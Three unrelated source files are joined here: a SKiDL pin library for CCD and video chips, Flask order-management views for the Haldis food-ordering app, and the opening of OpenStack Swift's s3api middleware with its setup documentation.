            Pin(num='J2',name='D6',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K2',name='D8',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A3',name='MSHUT',func=Pin.OUTPUT,do_erc=True),
            Pin(num='B3',name='STROBE',func=Pin.OUTPUT,do_erc=True),
            Pin(num='J3',name='VSUB',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K3',name='DRVDD',func=Pin.PWROUT,do_erc=True),
            Pin(num='A4',name='SDI',do_erc=True),
            Pin(num='B4',name='SCK',do_erc=True),
            Pin(num='J4',name='SUBCK',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K4',name='DRVSS',func=Pin.PWROUT,do_erc=True),
            Pin(num='A5',name='REFT',func=Pin.OUTPUT,do_erc=True),
            Pin(num='B5',name='SL',do_erc=True),
            Pin(num='J5',name='V2',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K5',name='V1',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A6',name='REFB',func=Pin.OUTPUT,do_erc=True),
            Pin(num='B6',name='AVSS2',func=Pin.PWRIN,do_erc=True),
            Pin(num='J6',name='V4',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K6',name='V3',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A7',name='BYP3',func=Pin.OUTPUT,do_erc=True),
            Pin(num='B7',name='AVDD2',func=Pin.PWRIN,do_erc=True),
            Pin(num='J7',name='VSG2/V6',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K7',name='VSG1/V5',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A8',name='CDD-IN',do_erc=True),
            Pin(num='B8',name='BYP2',func=Pin.OUTPUT,do_erc=True),
            Pin(num='J8',name='VSG4/V8',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K8',name='VSG3/V7',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A9',name='BYP1',func=Pin.OUTPUT,do_erc=True),
            Pin(num='B9',name='AVSS1',func=Pin.PWRIN,do_erc=True),
            Pin(num='C9',name='TCVSS',func=Pin.PWRIN,do_erc=True),
            Pin(num='D9',name='RG',func=Pin.OUTPUT,do_erc=True),
            Pin(num='E9',name='RGVSS',func=Pin.PWRIN,do_erc=True),
            Pin(num='F9',name='H4',func=Pin.OUTPUT,do_erc=True),
            Pin(num='G9',name='HVSS',func=Pin.PWRIN,do_erc=True),
            Pin(num='H9',name='H2',func=Pin.OUTPUT,do_erc=True),
            Pin(num='J9',name='VSG6',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K9',name='VSG5',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A10',name='AVDD1',func=Pin.PWRIN,do_erc=True),
            Pin(num='B10',name='TCVDD',func=Pin.PWRIN,do_erc=True),
            Pin(num='C10',name='CLI',do_erc=True),
            Pin(num='D10',name='CLO',func=Pin.OUTPUT,do_erc=True),
            Pin(num='E10',name='RGVDD',func=Pin.PWRIN,do_erc=True),
            Pin(num='F10',name='H3',func=Pin.OUTPUT,do_erc=True),
            Pin(num='G10',name='HVDD',func=Pin.PWRIN,do_erc=True),
            Pin(num='H10',name='H1',func=Pin.OUTPUT,do_erc=True),
            Pin(num='J10',name='VSG8',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K10',name='VSG7',func=Pin.OUTPUT,do_erc=True)]),
        Part(name='AD9895',dest=TEMPLATE,tool=SKIDL,keywords='CCD Signal Processor',description='CCD Signal Processor, 30MHz 12bits, CSPBGA-64',ref_prefix='U',num_units=1,fplist=['BGA*10x10*9.0x9.0mm*Pitch0.8mm*'],do_erc=True,pins=[
            Pin(num='A1',name='VD',func=Pin.BIDIR,do_erc=True),
            Pin(num='B1',name='HD',func=Pin.BIDIR,do_erc=True),
            Pin(num='C1',name='SYNC',do_erc=True),
            Pin(num='D1',name='DCLK',func=Pin.OUTPUT,do_erc=True),
            Pin(num='E1',name='D1',func=Pin.OUTPUT,do_erc=True),
            Pin(num='F1',name='D3',func=Pin.OUTPUT,do_erc=True),
            Pin(num='G1',name='D5',func=Pin.OUTPUT,do_erc=True),
            Pin(num='H1',name='D7',func=Pin.OUTPUT,do_erc=True),
            Pin(num='J1',name='D9',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K1',name='D11',do_erc=True),
            Pin(num='A2',name='DVDD',func=Pin.PWRIN,do_erc=True),
            Pin(num='B2',name='DVSS',func=Pin.PWRIN,do_erc=True),
            Pin(num='C2',name='LD/FD',func=Pin.OUTPUT,do_erc=True),
            Pin(num='D2',name='PBLK/CLPOB',func=Pin.OUTPUT,do_erc=True),
            Pin(num='E2',name='D0',func=Pin.OUTPUT,do_erc=True),
            Pin(num='F2',name='D2/SD0',func=Pin.OUTPUT,do_erc=True),
            Pin(num='G2',name='D4',func=Pin.OUTPUT,do_erc=True),
            Pin(num='H2',name='D6',func=Pin.OUTPUT,do_erc=True),
            Pin(num='J2',name='D8',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K2',name='D10',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A3',name='MSHUT',func=Pin.OUTPUT,do_erc=True),
            Pin(num='B3',name='STROBE',func=Pin.OUTPUT,do_erc=True),
            Pin(num='J3',name='VSUB',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K3',name='DRVDD',func=Pin.PWROUT,do_erc=True),
            Pin(num='A4',name='SDI',do_erc=True),
            Pin(num='B4',name='SCK',do_erc=True),
            Pin(num='J4',name='SUBCK',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K4',name='DRVSS',func=Pin.PWROUT,do_erc=True),
            Pin(num='A5',name='REFT',func=Pin.OUTPUT,do_erc=True),
            Pin(num='B5',name='SL',do_erc=True),
            Pin(num='J5',name='V2',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K5',name='V1',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A6',name='REFB',func=Pin.OUTPUT,do_erc=True),
            Pin(num='B6',name='AVSS2',func=Pin.PWRIN,do_erc=True),
            Pin(num='J6',name='V4',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K6',name='V3',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A7',name='BYP3',func=Pin.OUTPUT,do_erc=True),
            Pin(num='B7',name='AVDD2',func=Pin.PWRIN,do_erc=True),
            Pin(num='J7',name='VSG2/V6',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K7',name='VSG1/V5',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A8',name='CDD-IN',do_erc=True),
            Pin(num='B8',name='BYP2',func=Pin.OUTPUT,do_erc=True),
            Pin(num='J8',name='VSG4/V8',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K8',name='VSG3/V7',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A9',name='BYP1',func=Pin.OUTPUT,do_erc=True),
            Pin(num='B9',name='AVSS1',func=Pin.PWRIN,do_erc=True),
            Pin(num='C9',name='TCVSS',func=Pin.PWRIN,do_erc=True),
            Pin(num='D9',name='RG',func=Pin.OUTPUT,do_erc=True),
            Pin(num='E9',name='RGVSS',func=Pin.PWRIN,do_erc=True),
            Pin(num='F9',name='H4',func=Pin.OUTPUT,do_erc=True),
            Pin(num='G9',name='HVSS',func=Pin.PWRIN,do_erc=True),
            Pin(num='H9',name='H2',func=Pin.OUTPUT,do_erc=True),
            Pin(num='J9',name='VSG6',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K9',name='VSG5',func=Pin.OUTPUT,do_erc=True),
            Pin(num='A10',name='AVDD1',func=Pin.PWRIN,do_erc=True),
            Pin(num='B10',name='TCVDD',func=Pin.PWRIN,do_erc=True),
            Pin(num='C10',name='CLI',do_erc=True),
            Pin(num='D10',name='CLO',func=Pin.OUTPUT,do_erc=True),
            Pin(num='E10',name='RGVDD',func=Pin.PWRIN,do_erc=True),
            Pin(num='F10',name='H3',func=Pin.OUTPUT,do_erc=True),
            Pin(num='G10',name='HVDD',func=Pin.PWRIN,do_erc=True),
            Pin(num='H10',name='H1',func=Pin.OUTPUT,do_erc=True),
            Pin(num='J10',name='VSG8',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K10',name='VSG7',func=Pin.OUTPUT,do_erc=True)]),
        Part(name='AV9173',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='CX7930',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='CXD3400N',dest=TEMPLATE,tool=SKIDL,keywords='CCD Clock Driver',description='6-channel Vertical Clock Driver for CCD Image Sensor, SSOP-20',ref_prefix='U',num_units=1,fplist=['SSOP*'],do_erc=True,pins=[
            Pin(num='1',name='VDD',func=Pin.PWRIN,do_erc=True),
            Pin(num='2',name='XSHT',do_erc=True),
            Pin(num='3',name='XV3',do_erc=True),
            Pin(num='4',name='XSG3B',do_erc=True),
            Pin(num='5',name='XSG3A',do_erc=True),
            Pin(num='6',name='XV1',do_erc=True),
            Pin(num='7',name='XSG1B',do_erc=True),
            Pin(num='8',name='XSG1A',do_erc=True),
            Pin(num='9',name='XV4',do_erc=True),
            Pin(num='10',name='XV2',do_erc=True),
            Pin(num='20',name='SHT',func=Pin.OUTPUT,do_erc=True),
            Pin(num='11',name='GND',func=Pin.PWRIN,do_erc=True),
            Pin(num='12',name='V2',func=Pin.OUTPUT,do_erc=True),
            Pin(num='13',name='V4',func=Pin.OUTPUT,do_erc=True),
            Pin(num='14',name='V1A',func=Pin.OUTPUT,do_erc=True),
            Pin(num='15',name='VH',func=Pin.PWRIN,do_erc=True),
            Pin(num='16',name='V1B',func=Pin.OUTPUT,do_erc=True),
            Pin(num='17',name='V3A',func=Pin.OUTPUT,do_erc=True),
            Pin(num='18',name='VL',func=Pin.PWRIN,do_erc=True),
            Pin(num='19',name='V3B',func=Pin.OUTPUT,do_erc=True)]),
        Part(name='HD63484',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='HD63484_PLCC',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='ICX415AQ',dest=TEMPLATE,tool=SKIDL,keywords='CCD B/W Image Sensor',description='Diagonal 8mm B/W Progressive Scan CCD Image Sensor with Square Pixel, CERDIP-22',ref_prefix='U',num_units=1,do_erc=True,pins=[
            Pin(num='3',name='V3',do_erc=True),
            Pin(num='4',name='V2',do_erc=True),
            Pin(num='5',name='V1',do_erc=True),
            Pin(num='7',name='GND',func=Pin.PWRIN,do_erc=True),
            Pin(num='9',name='VOUT',func=Pin.OUTPUT,do_erc=True),
            Pin(num='10',name='CGG',do_erc=True),
            Pin(num='20',name='CSUB',do_erc=True),
            Pin(num='21',name='SUBCIR',func=Pin.PWRIN,do_erc=True),
            Pin(num='12',name='VDD',func=Pin.PWRIN,do_erc=True),
            Pin(num='13',name='RG',do_erc=True),
            Pin(num='14',name='VL',func=Pin.PWRIN,do_erc=True),
            Pin(num='15',name='SUB',do_erc=True),
            Pin(num='16',name='H1',do_erc=True),
            Pin(num='17',name='H2',do_erc=True)]),
        Part(name='LM1881',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='MAX310',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='MAX311',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='MB88303P',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='S178',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='SI582',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='TDA1950',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['TDA1950F']),
        Part(name='TDA2593',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='TDA7260',dest=TEMPLATE,tool=SKIDL,do_erc=True),
        Part(name='TDA9500',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['TDA9503', 'TDA9513']),
        Part(name='TEA5115',dest=TEMPLATE,tool=SKIDL,do_erc=True)])
| |
"Script to generate the order related views of Haldis"
import random
import typing
from datetime import datetime
from werkzeug.wrappers import Response
# from flask import current_app as app
from flask import (
Blueprint,
abort,
flash,
redirect,
render_template,
request,
session,
url_for,
wrappers,
)
from flask_login import current_user, login_required
from forms import AnonOrderItemForm, OrderForm, OrderItemForm
from models import Order, OrderItem, User, db
from hlds.definitions import location_definitions, location_definition_version
from notification import post_order_to_webhook
from utils import ignore_none
order_bp = Blueprint("order_bp", "order")
@order_bp.route("/")
def orders(form: OrderForm = None) -> str:
    """Render the general list of open orders."""
    if form is None and not current_user.is_anonymous():
        # Logged-in users get a creation form; pre-select the location
        # passed as a query parameter, if any.
        form = OrderForm()
        form.location_id.default = request.args.get("location_id")
        form.process()
        form.populate()
    return render_template("orders.html", orders=get_orders(), form=form)
@order_bp.route("/create", methods=["POST"])
@login_required
def order_create() -> typing.Union[str, Response]:
    """Handle creation of a new order; redirect to it on success."""
    form = OrderForm()
    form.populate()
    if not form.validate_on_submit():
        # Invalid submission: re-render the overview with the form errors.
        return orders(form=form)
    new_order = Order()
    form.populate_obj(new_order)
    new_order.update_from_hlds()
    db.session.add(new_order)
    db.session.commit()
    post_order_to_webhook(new_order)
    return redirect(url_for("order_bp.order_from_id", order_id=new_order.id))
@order_bp.route("/<order_id>")
def order_from_id(order_id: int, form: OrderForm = None, dish_id=None) -> str:
    """Render a single order, with an item form while it is still open."""
    order = Order.query.filter(Order.id == order_id).first()
    if order is None:
        abort(404)
    if current_user.is_anonymous() and not order.public:
        flash("Please login to see this order.", "info")
        abort(401)
    if form is None:
        form = AnonOrderItemForm() if current_user.is_anonymous() else OrderItemForm()
        if order.location:
            form.populate(order.location)
    if order.is_closed():
        # Closed orders accept no more items.
        form = None
    total_price = sum(entry.price for entry in order.items)
    debts = sum(entry.price for entry in order.items if not entry.paid)
    dish = order.location.dish_by_id(dish_id) if order.location else None
    return render_template(
        "order.html",
        order=order,
        form=form,
        total_price=total_price,
        debts=debts,
        selected_dish=dish,
    )
@order_bp.route("/<order_id>/items")
def items_shop_view(order_id: int) -> str:
    """Render the shop-facing item list for an order."""
    order = Order.query.filter(Order.id == order_id).first()
    if order is None:
        abort(404)
    if current_user.is_anonymous() and not order.public:
        flash("Please login to see this order.", "info")
        abort(401)
    return render_template(
        "order_items.html",
        order=order,
        total_price=sum(entry.price for entry in order.items),
    )
@order_bp.route("/<order_id>/edit", methods=["GET", "POST"])
@login_required
def order_edit(order_id: int) -> typing.Union[str, Response]:
    """Generate order edit view from id.

    Only the order's courier or an admin may edit; others get HTTP 401.
    Unknown order ids yield HTTP 404.
    """
    order = Order.query.filter(Order.id == order_id).first()
    # Check existence first: the original dereferenced `order` before the
    # None-check, raising AttributeError for unknown ids.
    if order is None:
        abort(404)
    # Compare ids by value with != -- the original used `is not`, which
    # compares identity and is only reliable for CPython's small-int cache,
    # so it wrongly rejected the real courier for larger ids.
    if current_user.id != order.courier_id and not current_user.is_admin():
        abort(401)
    orderForm = OrderForm(obj=order)
    orderForm.populate()
    if orderForm.validate_on_submit():
        orderForm.populate_obj(order)
        order.update_from_hlds()
        db.session.commit()
        return redirect(url_for("order_bp.order_from_id", order_id=order.id))
    return render_template("order_edit.html", form=orderForm, order_id=order_id)
@order_bp.route("/<order_id>/create", methods=["GET", "POST"])
def order_item_create(order_id: int) -> typing.Any:
    # type is 'typing.Union[str, Response]', but this errors due to
    # https://github.com/python/mypy/issues/7187
    "Add item to order from id"
    current_order = Order.query.filter(Order.id == order_id).first()
    if current_order is None:
        abort(404)
    if current_order.is_closed():
        # No new items once the order is closed.
        abort(404)
    if current_user.is_anonymous() and not current_order.public:
        flash("Please login to see this order.", "info")
        abort(401)
    location = current_order.location
    # If location doesn't exist any more, adding items is nonsensical
    if not location:
        abort(404)
    # Anonymous visitors get a form that also asks for their name.
    form = AnonOrderItemForm() if current_user.is_anonymous() else OrderItemForm()
    # On POST the dish comes from the form; on GET from the query string.
    dish_id = request.form["dish_id"] if form.is_submitted() else request.args.get("dish")
    if dish_id and not location.dish_by_id(dish_id):
        abort(404)
    if not form.is_submitted():
        form.dish_id.data = dish_id
    form.populate(current_order.location)
    if form.is_submitted():
        form_for_dish = request.form["dish_id"]
        dish_was_changed = form_for_dish != "" and form_for_dish != dish_id
        # The form's validation tests that dish_id is valid and gives a friendly error if it's not
        choices = location.dish_by_id(form.dish_id.data).choices
        # Resolve each dish choice to the selected option (single_choice)
        # or to the list of selected options (multi choice).
        chosen = [
            (
                choice.option_by_id(request.form.get("choice_" + choice.id))
                if choice_type == "single_choice"
                else list(
                    ignore_none(
                        request.form.getlist(
                            "choice_" + choice.id, type=choice.option_by_id
                        )
                    )
                )
            )
            for (choice_type, choice) in choices
        ]
        all_choices_present = all(x is not None for x in chosen)
        if dish_was_changed or not all_choices_present:
            # Dish switched or choices incomplete: redirect back to the form,
            # carrying over whatever fields already validated.
            try:
                user_name = (
                    form.user_name.data if form.user_name.validate(form) else None
                )
            except AttributeError:
                # The logged-in form has no user_name field.
                user_name = None
            comment = form.comment.data if form.comment.validate(form) else None
            return redirect(
                url_for(
                    "order_bp.order_item_create",
                    order_id=order_id,
                    dish=form.dish_id.data,
                    user_name=user_name,
                    comment=comment,
                )
            )
    # If the form was not submitted (GET request) or the form had errors: show form again
    if not form.validate_on_submit():
        return order_from_id(order_id, form=form, dish_id=dish_id)
    # Form was submitted and is valid
    item = OrderItem()
    form.populate_obj(item)
    item.hlds_data_version = location_definition_version
    item.order_id = order_id
    if not current_user.is_anonymous():
        item.user_id = current_user.id
    else:
        # Remember the anonymous name so the same visitor can manage the item.
        session["anon_name"] = item.user_name

    # XXX Temporary until OrderItemChoice is used
    def _name(option):
        # Human-readable name of a chosen option; None suppresses it.
        no_text_tag = "no_text"
        try:
            if not option or no_text_tag in option.tags:
                return None
            return option.name
        except AttributeError:
            # `option` is a list of options (multi choice).
            return ", ".join(o.name for o in option if no_text_tag not in o.tags)

    comments = list(ignore_none(_name(option) for option in chosen))
    if item.comment:
        comments.append("Comment: " + item.comment)
    item.comment = "; ".join(comments)
    item.update_from_hlds()

    # XXX Temporary until OrderItemChoice is used. Move this price calculation to update_from_hlds
    # when in OrderItemChoice is in place.
    def _price(option):
        # Price contribution of a chosen option (or list of options).
        try:
            return option.price or 0
        except AttributeError:
            return sum(o.price or 0 for o in option)

    item.price += sum(_price(option) for option in chosen)
    db.session.add(item)
    db.session.commit()
    flash("Ordered %s" % (item.dish_name), "success")
    return redirect(url_for("order_bp.order_from_id", order_id=order_id))
@order_bp.route("/<order_id>/<user_name>/user_paid", methods=["POST"])
@login_required
# pylint: disable=R1710
def items_user_paid(order_id: int, user_name: str) -> typing.Optional[Response]:
    """Mark all of a user's items in an order as paid.

    Only the order's courier or an admin may do this; everyone else
    (and unknown orders) gets HTTP 404.
    """
    user = User.query.filter(User.username == user_name).first()
    items: typing.List[OrderItem] = []
    if user:
        # Registered user: match on the account id.
        items = OrderItem.query.filter(
            (OrderItem.user_id == user.id) & (OrderItem.order_id == order_id)
        ).all()
    else:
        # Anonymous orderer: match on the free-form name.
        items = OrderItem.query.filter(
            (OrderItem.user_name == user_name) & (OrderItem.order_id == order_id)
        ).all()
    current_order = Order.query.filter(Order.id == order_id).first()
    # Guard against unknown order ids; the original dereferenced None here.
    if current_order is None:
        abort(404)
    if current_order.courier_id == current_user.id or current_user.admin:
        for item in items:
            item.paid = True
        db.session.commit()
        # Only read the item's display name when items exist; the original
        # raised NameError on an empty result set.
        display_name = items[-1].for_name if items else user_name
        flash("Paid %d items for %s" % (len(items), display_name), "success")
        return redirect(url_for("order_bp.order_from_id", order_id=order_id))
    abort(404)
@order_bp.route("/<order_id>/<item_id>/delete", methods=["POST"])
# pylint: disable=R1710
def delete_item(order_id: int, item_id: int) -> typing.Any:
    # type is 'typing.Optional[Response]', but this errors due to
    # https://github.com/python/mypy/issues/7187
    """Delete an item from an order.

    Allowed for the item's owner (logged-in or matching anonymous name);
    anything else gets HTTP 404.
    """
    item = OrderItem.query.filter(OrderItem.id == item_id).first()
    # Unknown item ids previously crashed with AttributeError on None.
    if item is None:
        abort(404)
    user_id = None
    if not current_user.is_anonymous():
        user_id = current_user.id
    if item.can_delete(order_id, user_id, session.get("anon_name", "")):
        dish_name = item.dish_name
        db.session.delete(item)
        db.session.commit()
        flash("Deleted %s" % (dish_name), "success")
        return redirect(url_for("order_bp.order_from_id", order_id=order_id))
    abort(404)
@order_bp.route("/<order_id>/volunteer", methods=["POST"])
@login_required
def volunteer(order_id: int) -> Response:
    """Let the current user volunteer as courier for an order."""
    order = Order.query.filter(Order.id == order_id).first()
    if order is None:
        abort(404)
    has_courier = order.courier_id is not None and order.courier_id != 0
    if has_courier:
        flash("Volunteering not possible!")
    else:
        order.courier_id = current_user.id
        db.session.commit()
        flash("Thank you for volunteering!")
    return redirect(url_for("order_bp.order_from_id", order_id=order_id))
@order_bp.route("/<order_id>/close", methods=["POST"])
@login_required
def close_order(order_id: int) -> typing.Optional[Response]:
    """Close an order, drawing a random courier if nobody volunteered."""
    order = Order.query.filter(Order.id == order_id).first()
    if order is None:
        abort(404)
    may_close = current_user.id == order.courier_id or current_user.is_admin()
    if may_close and not order.is_closed():
        order.stoptime = datetime.now()
        if not order.courier_id:
            # Nobody volunteered (id is 0 or None): pick a participant.
            chosen = select_user(order.items)
            if chosen is not None:
                order.courier_id = chosen.id
        db.session.commit()
        return redirect(url_for("order_bp.order_from_id", order_id=order_id))
    return None
def select_user(items) -> typing.Optional[User]:
    """Pick a random courier among the users signed up for the order.

    A higher `user.bias` increases the odds of being picked; items
    without a user account are never selected.
    """
    candidates = [entry for entry in items if entry.user_id]
    if not candidates:
        return None
    while True:
        picked = random.choice(candidates).user
        if picked and random.randint(picked.bias, 100) < 80:
            # Rejected this round; draw again.
            continue
        if picked is not None:
            return picked
def get_orders(expression=None) -> typing.List[Order]:
    """Return all orders matching *expression*.

    Defaults to currently-running orders; anonymous visitors are further
    restricted to public ones.
    """
    if expression is None:
        # Running now, or without a stop time at all.
        # pylint: disable=C0121
        expression = (
            (datetime.now() > Order.starttime) & (Order.stoptime > datetime.now())
        ) | (Order.stoptime == None)
    if current_user.is_anonymous():
        # pylint: disable=C0121
        return Order.query.filter(expression & (Order.public == True)).all()
    return Order.query.filter(expression).all()
| |
# Copyright (c) 2010-2014 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The s3api middleware will emulate the S3 REST api on top of swift.
To enable this middleware to your configuration, add the s3api middleware
in front of the auth middleware. See ``proxy-server.conf-sample`` for more
detail and configurable options.
To set up your client, ensure you are using the tempauth or keystone auth
system for swift project.
When running Swift in a SAIO environment, make sure you have the tempauth
middleware configured in ``proxy-server.conf``. The access key will be
the concatenation of the account and user strings that should look like
test:tester, and the secret access key is the account password. The host should
also point to the swift storage hostname.
The tempauth option example:
.. code-block:: ini
[filter:tempauth]
use = egg:swift#tempauth
user_admin_admin = admin .admin .reseller_admin
user_test_tester = testing
An example client using tempauth with the python boto library is as follows:
.. code-block:: python
from boto.s3.connection import S3Connection
connection = S3Connection(
aws_access_key_id='test:tester',
aws_secret_access_key='testing',
port=8080,
host='127.0.0.1',
is_secure=False,
calling_format=boto.s3.connection.OrdinaryCallingFormat())
And if you are using keystone auth, you need EC2 credentials, which can
be downloaded from the API Endpoints tab of the dashboard or created with
the openstack ec2 command.
Here is an example of creating an EC2 credential:
.. code-block:: console
# openstack ec2 credentials create
+------------+---------------------------------------------------+
| Field | Value |
+------------+---------------------------------------------------+
| access | c2e30f2cd5204b69a39b3f1130ca8f61 |
| links | {u'self': u'http://controller:5000/v3/......'} |
| project_id | 407731a6c2d0425c86d1e7f12a900488 |
| secret | baab242d192a4cd6b68696863e07ed59 |
| trust_id | None |
| user_id | 00f0ee06afe74f81b410f3fe03d34fbc |
+------------+---------------------------------------------------+
An example client using keystone auth with the python boto library will be:
.. code-block:: python
from boto.s3.connection import S3Connection
connection = S3Connection(
aws_access_key_id='c2e30f2cd5204b69a39b3f1130ca8f61',
aws_secret_access_key='baab242d192a4cd6b68696863e07ed59',
port=8080,
host='127.0.0.1',
is_secure=False,
calling_format=boto.s3.connection.OrdinaryCallingFormat())
----------
Deployment
----------
Proxy-Server Setting
^^^^^^^^^^^^^^^^^^^^
Set s3api before your auth in your pipeline in ``proxy-server.conf`` file.
To enable all compatibility currently supported, you should make sure that
bulk, slo, and your auth middleware are also included in your proxy
pipeline setting.
Using tempauth, the minimum example config is:
.. code-block:: ini
[pipeline:main]
pipeline = proxy-logging cache s3api tempauth bulk slo proxy-logging \
proxy-server
When using keystone, the config will be:
.. code-block:: ini
[pipeline:main]
pipeline = proxy-logging cache authtoken s3api s3token keystoneauth bulk \
slo proxy-logging proxy-server
Finally, add the s3api middleware section:
.. code-block:: ini
[filter:s3api]
use = egg:swift#s3api
.. note::
``keystonemiddleware.authtoken`` can be located before/after s3api but
we recommend to put it before s3api because when authtoken is after s3api,
both authtoken and s3token will issue the acceptable token to keystone
(i.e. authenticate twice). And in the ``keystonemiddleware.authtoken``
middleware , you should set ``delay_auth_decision`` option to ``True``.
-----------
Constraints
-----------
Currently, the s3api is being ported from https://github.com/openstack/swift3
so any existing issues in swift3 are still remaining. Please make sure
descriptions in the example ``proxy-server.conf`` and what happens with the
config, before enabling the options.
-------------
Supported API
-------------
The compatibility will continue to be improved upstream; you can keep an
eye on compatibility via a check tool built by SwiftStack. See
https://github.com/swiftstack/s3compat for details.
"""
from cgi import parse_header
import json
from paste.deploy import loadwsgi
from swift.common.constraints import valid_api_version
from swift.common.middleware.listing_formats import \
MAX_CONTAINER_LISTING_CONTENT_LENGTH
from swift.common.wsgi import PipelineWrapper, loadcontext, WSGIContext
from swift.common.middleware.s3api.exception import NotS3Request, \
InvalidSubresource
from swift.common.middleware.s3api.s3request import get_request_class
from swift.common.middleware.s3api.s3response import ErrorResponse, \
InternalError, MethodNotAllowed, S3ResponseBase, S3NotImplemented
from swift.common.utils import get_logger, register_swift_info, \
config_true_value, config_positive_int_value, split_path, \
closing_if_possible
from swift.common.middleware.s3api.utils import Config
from swift.common.middleware.s3api.acl_handlers import get_acl_handler
class ListingEtagMiddleware(object):
    """WSGI filter that rewrites hashes in JSON container listings.

    Multipart objects carry a hash of the form ``<etag>; s3_etag=<value>``;
    this middleware splits that into a plain ``hash`` plus a separate,
    quoted ``s3_etag`` key in each listing entry.
    """

    def __init__(self, app):
        # Wrapped WSGI application.
        self.app = app

    def __call__(self, env, start_response):
        # a lot of this is cribbed from listing_formats / swob.Request
        if env['REQUEST_METHOD'] != 'GET':
            # Nothing to translate
            return self.app(env, start_response)
        try:
            # Exactly three path segments (version/account/container)
            # identifies a container listing request.
            v, a, c = split_path(env.get('SCRIPT_NAME', '') +
                                 env['PATH_INFO'], 3, 3)
            if not valid_api_version(v):
                raise ValueError
        except ValueError:
            is_container_req = False
        else:
            is_container_req = True
        if not is_container_req:
            # pass through
            return self.app(env, start_response)
        ctx = WSGIContext(self.app)
        resp_iter = ctx._app_call(env)
        # Scan response headers for content type and length; stop once
        # both are known.
        content_type = content_length = cl_index = None
        for index, (header, value) in enumerate(ctx._response_headers):
            header = header.lower()
            if header == 'content-type':
                content_type = value.split(';', 1)[0].strip()
                if content_length:
                    break
            elif header == 'content-length':
                cl_index = index
                try:
                    content_length = int(value)
                except ValueError:
                    pass  # ignore -- we'll bail later
                if content_type:
                    break
        # Only rewrite sanely-sized JSON listings; stream anything else
        # through untouched.
        if content_type != 'application/json' or content_length is None or \
                content_length > MAX_CONTAINER_LISTING_CONTENT_LENGTH:
            start_response(ctx._response_status, ctx._response_headers,
                           ctx._response_exc_info)
            return resp_iter
        # We've done our sanity checks, slurp the response into memory
        with closing_if_possible(resp_iter):
            body = b''.join(resp_iter)
        try:
            listing = json.loads(body)
            for item in listing:
                if 'subdir' in item:
                    # Delimiter marker, not an object -- no hash to fix.
                    continue
                value, params = parse_header(item['hash'])
                if 's3_etag' in params:
                    item['s3_etag'] = '"%s"' % params.pop('s3_etag')
                    item['hash'] = value + ''.join(
                        '; %s=%s' % kv for kv in params.items())
        except (TypeError, KeyError, ValueError):
            # If anything goes wrong above, drop back to original response
            start_response(ctx._response_status, ctx._response_headers,
                           ctx._response_exc_info)
            return [body]
        body = json.dumps(listing).encode('ascii')
        # The body changed size; patch Content-Length in place.
        ctx._response_headers[cl_index] = (
            ctx._response_headers[cl_index][0],
            str(len(body)),
        )
        start_response(ctx._response_status, ctx._response_headers,
                       ctx._response_exc_info)
        return [body]
class S3ApiMiddleware(object):
    """S3Api: S3 compatibility middleware"""

    def __init__(self, app, conf, *args, **kwargs):
        """Wrap *app*, reading s3api options from *conf* with defaults."""
        self.app = app
        self.conf = Config()

        # Set default values if they are not configured
        self.conf.allow_no_owner = config_true_value(
            conf.get('allow_no_owner', False))
        self.conf.location = conf.get('location', 'us-east-1')
        self.conf.dns_compliant_bucket_names = config_true_value(
            conf.get('dns_compliant_bucket_names', True))
        self.conf.max_bucket_listing = config_positive_int_value(
            conf.get('max_bucket_listing', 1000))
        self.conf.max_parts_listing = config_positive_int_value(
            conf.get('max_parts_listing', 1000))
        self.conf.max_multi_delete_objects = config_positive_int_value(
            conf.get('max_multi_delete_objects', 1000))
        self.conf.multi_delete_concurrency = config_positive_int_value(
            conf.get('multi_delete_concurrency', 2))
        self.conf.s3_acl = config_true_value(
            conf.get('s3_acl', False))
        self.conf.storage_domain = conf.get('storage_domain', '')
        self.conf.auth_pipeline_check = config_true_value(
